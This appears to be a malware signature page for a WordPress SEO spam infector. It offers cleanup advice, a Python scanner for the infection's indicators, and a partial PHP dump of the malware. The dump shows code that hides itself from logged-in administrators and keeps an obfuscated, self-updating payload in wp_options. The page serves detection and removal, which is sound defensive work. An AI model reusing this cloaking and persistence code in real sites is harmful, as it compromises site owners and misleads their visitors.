Malware Signatures

php.spam-seo.wordpress-infector.001

Blackhat SEO is a malicious technique used to manipulate search engine results so that a website gains relevance. The payload is PHP-based and therefore server-side: it is executed directly on the server while the site is loaded. Only the payload's result (such as a malicious iframe or redirect) is visible in the browser, not the malicious code itself.
This malware is WordPress-specific, relying not only on the filesystem to install itself but also on the database (wp_options), where the final payload is stored obfuscated.
It has an update function, always looking for the most recent version of its code whenever it is executed.

Affecting

Any vulnerable WordPress-based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files looking for the callback_function_php function, and check your WordPress database. Also, you can contact Sucuri to help you with the infection removal.
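
One way to script both checks, as an added example that is not Sucuri's code: it searches PHP files for the two function names seen in the dump on this page and flags wp_options rows whose serialized value has the shape that code writes with update_option(). The row tuples, the sample data and the autoload handling are assumptions made for illustration; the dump replaces the real option name with a placeholder, so the row check is a heuristic on the value, not on the name.

```python
import os
import re

# Function names taken from the dump on this page.
FILE_INDICATORS = ("callback_function_php", "update_file_999")

# The dumped code stores array(0 => payload, 1 => time()); PHP serialize()
# writes that as a:2:{i:0;s:N:"...";i:1;i:<unix time>;}
OPTION_SHAPE = re.compile(
    r'^a:2:\{i:0;s:\d+:"(?P<buf>.*)";i:1;i:(?P<ts>\d{9,10});\}$', re.S)


def scan_tree(root):
    """Return {path: [indicator, ...]} for .php files under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            found = [i for i in FILE_INDICATORS if i in text]
            if found:
                hits[path] = found
    return hits


def suspicious_options(rows):
    """rows: (option_name, option_value, autoload) tuples exported from wp_options.
    Heuristic: non-autoloaded 2-item array whose first item contains '|||'."""
    flagged = []
    for name, value, autoload in rows:
        m = OPTION_SHAPE.match(value or "")
        # 'no' is what the dump passes to add_option(); 'off' is accepted too,
        # on the assumption that newer WordPress releases store that value.
        if autoload in ("no", "off") and m and "|||" in m.group("buf"):
            flagged.append(name)
    return flagged


# Constructed sample rows (not taken from a real site).
SAMPLE_ROWS = [
    ("siteurl", "https://example.test", "yes"),
    ("wp_example_opt", 'a:2:{i:0;s:12:"1|||<b>x</b>";i:1;i:1700000000;}', "no"),
]
```

A flagged row or file is a lead for manual review, since the option name and file location vary per infection.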

Dump


function callback_function_php($p)
{

    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in())) {
        return $p;
    }

    $x = '{options_names}';
    $buf = "";
    $update = 0;
    if (!$k = get_option($x)) {
        if (!add_option($x, Array(), '', 'no')) {
            return $p;
        }
        $update = 1;
    } else {
        $ctime = time() - @$k[1];
        if ($ctime > 3600 * 12) {
            $update = 1;
        }

    }
    if ($update) {
        $val = update_file_999();
        $k = array();
        $k[0] = $val;
        $k[1] = time();
        if (!update_option($x, $k)) {
            return $p;
        }
    }
    if (!$k = get_option($x)) {
        return $p;
    }

    $buf = @$k[0];
    if ($buf == "") {
        return $p;
    }
    list($type, $text) = @explode("|||", $buf);
    if ($text == "")
        return $p;